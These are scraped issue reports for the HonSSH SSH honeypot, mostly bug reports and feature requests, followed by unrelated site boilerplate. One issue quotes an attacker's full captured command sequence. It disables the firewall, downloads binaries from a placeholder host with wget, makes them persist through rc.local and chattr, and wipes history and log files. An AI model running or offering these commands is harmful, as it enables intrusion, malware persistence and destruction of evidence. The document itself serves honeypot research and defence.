Include the ability to log data to an SQL database, like Kippo.
ETA: ???
Original issue reported on code.google.com by [email protected]
on 30 Mar 2014 at 5:32
What steps will reproduce the problem?
1. The attacker has found the login to the honeypot
2. The attacker executes a series of commands while logging in (i've seen more
and more of this behavior lately), some of which includes a wget command(s),
the files are not caught by HonSSH.
Example:
ssh -l root blacks.trollpot.biteme /etc/init.d/iptables stop\necho "nameserver
8.8.8.8" >> /etc/resolv.conf\necho "nameserver 8.8.4.4" >>
/etc/resolv.conf\nyum -y install wget\nchmod 7777 / etc\nkillall -9
.IptabLes\nkillall -9 nfsd4\nkillall -9 profild.key\ncd /etc;rm -rf dir
fake.cfg\nkillall -9 nfsd\nkillall -9 DDosl\nkillall -9 lengchao32\nkillall -9
b26\nkillall -9 Bill\nkillall -9 n26\nkillall -9 1\nkillall -9
codelove\nkillall -9 32\nkillall -9 m32\nkillall -9 m64\nkillall -9 64\nkillall
-9 83BOT \nkillall -9 82BOT\nkillall -9 dos64\nkillall -9 dos32\nkillall -9
new6\nkillall -9 new4\nkillall -9 node24\nkillall -9 mimi\nkillall -9
nodeJR-1\nkillall -9 freeBSD\nkillall -9 ksapdd\nkillall -9 kysapdd\nkillall -9
sksapdd\nkillall -9 xsw \nkillall -9 syslogd\nkillall -9 skysapdd\nkillall -9
cupsddd\nkillall -9 ksapd\nkillall -9 atddd\nkillall -9 xfsdxd\ncd /root; chmod
7777 / etc\nkillall -9 minerd\nkillall -9 0\nkillall -9 joudckfr\nkillall -9
www\nkillall -9 log\nkillall -9 .IptabLex\nkillall -9 .Mm2\nkillall -9
acpid\nkillall -9 m64 \nkillall -9 ./QQ\nkillall -9 QQ\nkillall -9 g3\nkillall
-9 2\nkillall -9 3\nkillall -9 pm\nkillall -9 qweasd\nkillall -9
tangtang\nkillall -9 imap-login\nkillall -9 cupsdd\nkillall -9 xudp\nkillall -9
txma\nkillall -9 mrdos64.b00\nkillall -9 mrdos32.b00\nkillall -9
kkpklp\nkillall -9 kiilp\nkillall -9 xin1\nkillall -9 jibateng\ncd /root;rm -rf
dir nohup.out\ncd /etc;rm -rf dir cupsddd\ncd /etc;rm -rf dir atddd\ncd /etc;rm
-rf dir ksapdd\ncd /etc;rm -rf dir kysapdd\ncd /etc;rm -rf dir sksapdd\ncd
/etc;rm -rf dir skysapdd\ncd /etc;rm -rf dir xfsdxd\ncd /etc;rm -rf dir
fake.cfg\ncd /etc;rm -rf dir cupsdd\ncd /etc;rm -rf dir cupsdd.*\ncd /etc;rm
-rf dir cupsddd.*\ncd /etc;rm -rf dir atddd.*\ncd /etc;rm -rf dir ksapdd.*\ncd
/etc;rm -rf dir kysapdd.*\ncd /etc;rm -rf dir sksapdd.*\ncd /etc;rm -rf dir
skysapdd.*\ncd /etc;rm -rf dir xfsdxd.*\ncd /etc;rm -rf dir cupsdd\ncd /etc;rm
-rf dir atdd\ncd /etc;rm -rf dir ksapd\ncd /etc;rm -rf dir kysapd\ncd /etc;rm
-rf dir sksapd\ncd /etc;rm -rf dir skysapd\ncd /etc;rm -rf dir xfsdx\ncd
/etc;rm -rf dir fake.cfg\ncd /etc;rm -rf dir cupsdd.*\ncd /etc;rm -rf dir
atdd.*\ncd /etc;rm -rf dir ksapd.*\ncd /etc;rm -rf dir kysapd.*\ncd /etc;rm -rf
dir sksapd.*\ncd /etc;rm -rf dir skysapd.*\ncd /etc;rm -rf dir xfsdx.*\ncd
/var/spool/cron; rm -rf dir root.*\ncd /var/spool/cron; rm -rf dir root\ncd
/var/spool/cron/crontabs; rm -rf dir root.*\ncd /var/spool/cron/crontabs; rm
-rf dir root\ncd /var/spool/cron ;wget http://sketchy.ip.address/root\ncd
/var/spool/cron/crontabs ;wget http://sketchy.ip.address/root\ncd /etc;wget
http://sketchy.ip.address/cupsdd\ncd /etc;wget
http://sketchy.ip.address/ksapdd\ncd /etc;wget
http://sketchy.ip.address/kysapdd\ncd /etc;wget
http://sketchy.ip.address/atddd\ncd /etc;wget
http://sketchy.ip.address/skysapdd\ncd /etc;wget
http://sketchy.ip.address/sksapdd\ncd /etc;wget
http://sketchy.ip.address/xfsdxd\ncd /etc;chmod 7777 xfsdxd\ncd /etc;chmod 7777
atddd\ncd /etc;chmod 7777 cupsdd\ncd /etc;chmod 7777 ksapdd\ncd /etc;chmod 7777
kysapdd\ncd /etc;chmod 7777 skysapdd\ncd /etc;chmod 7777 sksapdd\nnohup
/etc/xfsdxd > /dev/null 2>&1&\nnohup /etc/cupsdd > /dev/null 2>&1&\nnohup
/etc/ksapdd > /dev/null 2>&1&\nnohup /etc/kysapdd > /dev/null 2>&1&\nnohup
/etc/atddd > /dev/null 2>&1&\nnohup /etc/skysapdd > /dev/null 2>&1&\nnohup
/etc/sksapdd > /dev/null 2>&1&\necho "cd /etc;./ksapdd" >> /etc/rc.local \necho
"cd /etc;./kysapdd" >> /etc/rc.local \necho "cd /etc;./atddd" >> /etc/rc.local
\necho "cd /etc;./ksapdd" >> /etc/rc.local \necho "cd /etc;./skysapdd" >>
/etc/rc.local \necho "cd /etc;./xfsdxd" >> /etc/rc.local \necho "unset
MAILCHECK" >> /etc/profile\ncd /etc;chattr +i cupsdd\ncd /etc;chattr +i
cupsdd\ncd /etc;chattr +i cupsdd\ncd /etc;chattr +i cupsdd\ncd /etc;chattr +i
cupsdd\nrm -rf /root/.bash_history\ntouch /root/.bash_history\nhistory -r\ncd
/var/log > dmesg \ncd /var/log > auth.log \ncd /var/log > alternatives.log \ncd
/var/log > boot.log \ncd /var/log > btmp \ncd /var/log > cron \ncd /var/log >
cups \ncd /var/log > daemon.log \ncd /var/log > dpkg.log \ncd /var/log >
faillog \ncd /var/log > kern.log \ncd /var/log > lastlog\ncd /var/log > maillog
\ncd /var/log > user.log \ncd /var/log > Xorg.x.log \ncd /var/log >
anaconda.log \ncd /var/log > yum.log \ncd /var/log > secure\ncd /var/log >
wtmp\ncd /var/log > utmp \ncd /var/log > messages\ncd /var/log > spooler\ncd
/var/log > sudolog\ncd /var/log > aculog\ncd /var/log > access-log\ncd /root >
.bash_history\nhistory -c\necho
What is the expected output?
There are a number of files being downloaded here
(http://sketchy.ip.address/[filename])
that i would expect to be downloaded by HonSSH.
What do you see instead?
Only what is shown above.
What version of the product are you using? On what operating system?
b9880b4e367b
Please provide any additional information below.
Not sure if this is caused by running the commands at login, that there are
multiple wget commands
or something else.
Original issue reported on code.google.com by [email protected]
on 10 Mar 2014 at 10:29
It looks like if an attacker creates a reverse SSH-Connection this does not get
intercepted and the reverse connection request is send to the honeypot
ssh-server.
Original issue reported on code.google.com by [email protected]
on 28 Feb 2014 at 7:48
There is a problem with backslashes in the session command log files. Under
investigation.
Original issue reported on code.google.com by [email protected]
on 13 Aug 2013 at 8:15
2014-03-03 07:25:14 - Incoming connection from: 61.174.51.200:2629 -
SSH-2.0-libssh2_1.4.2
2014-03-03 07:25:14 - Failed login - Username:root Password:admin
2014-03-03 07:25:14 - Successful login - Username:root Password:123456
2014-03-03 07:25:16 - New message 98 type detected - Please raise a HonSSH
issue on google code with the details: subsystem
2014-03-03 07:25:16 - RAW CLIENT-SERVER: '\x00\x00\x00\x05\x01\x00\x00\x00\x03'
2014-03-03 07:25:17 - Lost connection from: 61.174.51.200
Please let me know if I can provide any more details.
Original issue reported on code.google.com by [email protected]
on 3 Mar 2014 at 12:38
HonSSH does not currently support two simultaneous channels over one connection
e.g. terminal and sftp
Original issue reported on code.google.com by [email protected]
on 15 Jun 2014 at 5:25
What steps will reproduce the problem?
1. Start honssh
2. SSH in with command on command line
3. Get h4x0r3d without logs of it
What is the expected output? What do you see instead?
The command. Just a log
What version of the product are you using? On what operating system?
The version in the repos from 28Feb
Please provide any additional information below.
The following command executes on the honeypot, but there is no log of it:
ssh -p 2222 root@honeypot 'echo foo > bar'
Original issue reported on code.google.com by [email protected]
on 2 Mar 2014 at 6:48
Hi Thomas,
This is only a suggestion for the mail templates thats being used by HonSSH.
It would be nice to get the country of origin added to the templates as well.
- The current output looks like this:
2014-08-09 22:46:33 - Incoming connection from: 8.8.8.8:42316 -
SSH-2.0-libssh-0.4.8
2014-08-09 22:46:33 - Successful login - Username:root Password:root
- My suggestion is changing it to something like this:
2014-08-09 22:46:33 - Incoming connection from: 8.8.8.8:42316 - United States -
SSH-2.0-libssh-0.4.8
2014-08-09 22:46:33 - Successful login - Username:root Password:root
Maybe it would be possible to add it using something similar to this?
import GeoIP
def cname(ipv4_str):
"""Checks the ipv4_str against the GeoIP database. Returns the full country name of origin if
the IPv4 address is found in the database. Returns None if not found."""
geo = GeoIP.new(GeoIP.GEOIP_MEMORY_CACHE)
country = geo.country_name_by_addr(ipv4_str)
return country
//Are
Original issue reported on code.google.com by [email protected]
on 9 Aug 2014 at 9:25
What steps will reproduce the problem?
hello,
I've been trying to set up honssh to work in a virtual(vmware) environment,
unfortunately i'm unable to get a good config.
config info (relevant to my issue):
ssh_addr = 192.168.1.75 -- honssh is running here
ssh_port = 2222
client_addr = 192.168.1.1
honey_addr = 192.168.1.211 -- vulnerable machine is running here
What is the expected output? What do you see instead?
Testing to log into the honeypot,
What i'm seeing is:
root@internet# ssh 192.168.1.75 -p 2222
Connection closed by 192.168.1.75
What version of the product are you using? On what operating system?
OS latest Ubuntu distribution x32
I believe i'm using the latest version: "git clone
https://code.google.com/p/honssh"
Please provide any additional information below.
i'll b ekeeping an eye on this thread if there is any info you'd like to know
from me i'll try to answer as fast as possible.
Thanks,
Dan.
Original issue reported on code.google.com by [email protected]
on 16 Feb 2014 at 1:51
As discussed
Original issue reported on code.google.com by [email protected]
on 16 Aug 2014 at 1:29
What steps will reproduce the problem?
1.
Enter an invalid in into honssh.cfg, "ssh_addr = 0.0.0."
2.
Execute honsshctrl.sh.
# ./honsshctrl.sh START
Starting honssh in background...
2014-05-04 16:01:35+0200 [-] Log opened.
2014-05-04 16:01:35+0200 [-] Starting factory
<honssh.client.HonsshSlimClientFactory instance at 0x2f75ef0>
2014-05-04 16:01:35+0200 [-] Loaded.
2014-05-04 16:01:35+0200 [-] Log opened.
2014-05-04 16:01:35+0200 [-] twistd 11.1.0 (/usr/bin/python 2.7.3) starting up.
2014-05-04 16:01:35+0200 [-] reactor class:
twisted.internet.pollreactor.PollReactor.
#
HonSSH appears to start and creates the honssh.pid file, but (for obvious
reasons) you will not be able to stop it.
# ./honsshctrl.sh STOP
Attempting to stop HonSSH (1355)...
ERROR: Unable to stop HonSSH (1355)
#
3.
Checking the honssh.log i see this.
- Log error form malformed IP address "0.0.0.".
2014-05-04 16:01:36+0200 [-] twisted.internet.error.CannotListenError: Couldn't
listen on 0.0.0.:22: [Errno -2] Name or service not known.
- Log error from an invalid port number "222222"
2014-05-04 16:04:41+0200 [-] OverflowError: getsockaddrarg: port must be
0-65535.
What is the expected output?
Its easy enough to find the cause of the issue in the honssh.log,
but it would be nice to have these lines sent to stdout as well.
What version of the product are you using?
b13ef1d01b16
On what operating system?
Ubuntu server 12.04 LTS
Please provide any additional information below.
Havent used HonSSH for a while.
Awesome to see what you've accomplished over the last weeks :D
//Are
Original issue reported on code.google.com by [email protected]
on 4 May 2014 at 2:13
What steps will reproduce the problem?
1.
Cloned honssh to server
2.
Started honssh using start.sh
3.
Testing to login in to honeypot. Was able to log in but when issuing any
commands, such as 'ls', the connection is closed.
What is the expected output?
The expected output, on the client side, would be the result of the command
executed on the server.
The expected output, on the server side (honssh), would be the executed
commands being populated in the current honssh.log.
What do you see instead?
- On the client side:
root:~# lsConnection to 11.22.33.44 closed by remote host.
Connection to 11.22.33.44 closed.
- On the server side, in honssh.log
2014-02-15 15:12:20+0100 [HonsshServerTransport,0,11.22.33.44] Unhandled Error
Traceback (most recent call last):
File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 88, in callWithLogger
return callWithContext({"system": lp}, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 73, in callWithContext
return context.call({ILogContext: newCtx}, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
return self.currentContext().callWithContext(ctx, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
return func(*args,**kw)
--- <exception caught here> ---
File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 614, in _doReadOrWrite
why = selectable.doRead()
File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 215, in doRead
return self._dataReceived(data)
File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 221, in _dataReceived
rval = self.protocol.dataReceived(data)
File "/usr/lib/python2.7/dist-packages/twisted/conch/ssh/transport.py", line 438, in dataReceived
self.dispatchMessage(messageNum, packet[1:])
File "/home/loke/honssh/honssh/server.py", line 131, in dispatchMessage
if self.cfg.get('extras', 'file_download') == 'true':
File "/usr/lib/python2.7/ConfigParser.py", line 618, in get
raise NoOptionError(option, section)
ConfigParser.NoOptionError: No option 'file_download' in section: 'extras'
2014-02-15 15:12:20+0100 [HonsshServerTransport,0,11.22.33.44] connection lost
What version of the product are you using?
Rev 7ceb089043af
On what operating system?
Ubuntu 13.10
Please provide any additional information below.
Original issue reported on code.google.com by [email protected]
on 15 Feb 2014 at 2:23
wget ([^;&|\\]+)
Original issue reported on code.google.com by [email protected]
on 25 May 2014 at 8:39
Ref Are.
Original issue reported on code.google.com by [email protected]
on 14 Sep 2014 at 2:00
What steps will reproduce the problem?
There is no issue, its a question/request :)
What is the expected output?
n/a
What do you see instead?
n/a
What version of the product are you using?
Latest
On what operating system?
OpenBSD 5.4
Please provide any additional information below.
Sorry to be submitting a ticket for this, its not really an issue with HonSSH
itself, but i do have a few questions and a feature request. I apologize in
advance if you do not handle this type of submits.
-----------------------------
Feature requests:
1)
When HonSSH downloads a file its stored in the 'downloads' directory.
In 'honssh/server.py' it will first check if 'downloads' exists and create it
if False. My suggestion is to separate the downloaded files by dates.
Example:
downloads/2014.02.15_malware
downloads/2014.02.22_malware
downloads/2014.02.23_malware
Instead of just testing for the 'downloads' directory i would like to test for
'downloads/YYYY.mm.dd_malware' instead.
2)
Using dates in files.
Some of the files that HonSSH create (tty logs) contain spaces and semicolons.
Would you be willing to change the format of this to something like
'YYYY.mm.dd_HHMMSS'?
-----------------------------
It's not really a big issue, but i basically have to edit the source each time
you release a new version - yes, i might be a bit lazy :P
-----------------------------
Questions:
I'm going deploy a large scale honey net (+100 nodes) and HonSSH will be the
'bread and butter' of this deployment and i have a few questions about what
HonSSH is capable of doing.
The general layout of the honey net will look like this
- Topology:
INTERNETZ ====== HONSSH ===== LARGE SCALE HONEYNET
HonSSH will be used on a OpenBSD firewall/NAT device (physical hardware) with
its external network interface connected directly to the network of our ISP and
will be assigned its IP address trough DHCP.
In 'honssh.cfg' i have to define the IP address of the external network card
(ssh_addr), this might be a slight issue as its assigned by DHCP (ISP assigns a
new one each 8 - 15 days). Would it be possible to use a FQDN (DDNS) instead of
an IP address here? If not, do you have any suggestions to solve this?
-----------------------------
Again, sorry if this falls outside the scope of your tickets.
HonSSH is the most promising project in the realm of high interaction honeypot
solutions i've seen since....well...basically ever, many thanks for your work
on this.
Kind regards,
B.September
Original issue reported on code.google.com by [email protected]
on 23 Feb 2014 at 4:05
Hi Peg.
Not sure if this is a pure HonSSH issue or not, but i'd be grateful if you
would have a look at it.
After an attack it looks like HonSSH keeps the sessions open:
tcp 0 0 88.222.55.22.22 117.21.191.209.4454 ESTABLISHED
tcp 0 0 88.222.55.22.22 117.21.191.209.2349 ESTABLISHED
tcp 0 0 88.222.55.22.22 117.21.191.208.4575 ESTABLISHED
tcp 0 0 88.222.55.22.22 61.174.51.218.3577 ESTABLISHED
tcp 0 0 88.222.55.22.22 61.174.51.217.1498 ESTABLISHED
tcp 0 0 88.222.55.22.22 115.239.248.59.2490 ESTABLISHED
tcp 0 0 88.222.55.22.22 115.239.248.59.1456 ESTABLISHED
tcp 0 0 88.222.55.22.22 115.239.248.59.2814 ESTABLISHED
tcp 0 0 *.22 *.* LISTEN
At first i thought it was the attacker(s) that kept the sessions open, but
tcpdump
does not show any packets being sent or received.
I also tried to configuring my firewall to be more aggressive in expiring
inactive
sessions.
I've only found two workarounds for this issue
1) restart HonSSH
2) reboot the router
What version of the product are you using?
b9880b4e367b
On what operating system?
OpenBSD 5.3 amd64
OpenBSD 5.4 amd64
Please provide any additional information below.
The issue is intermittent. HonSSH (and the firewall) is able to expire most
sessions
so it might be an issue with the client side(?). I've attached logs and
adv-logs for
you, hopefully you can make some sense of this.
Cheers,
Black September.
Original issue reported on code.google.com by [email protected]
on 15 Mar 2014 at 10:37
Attachments:
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.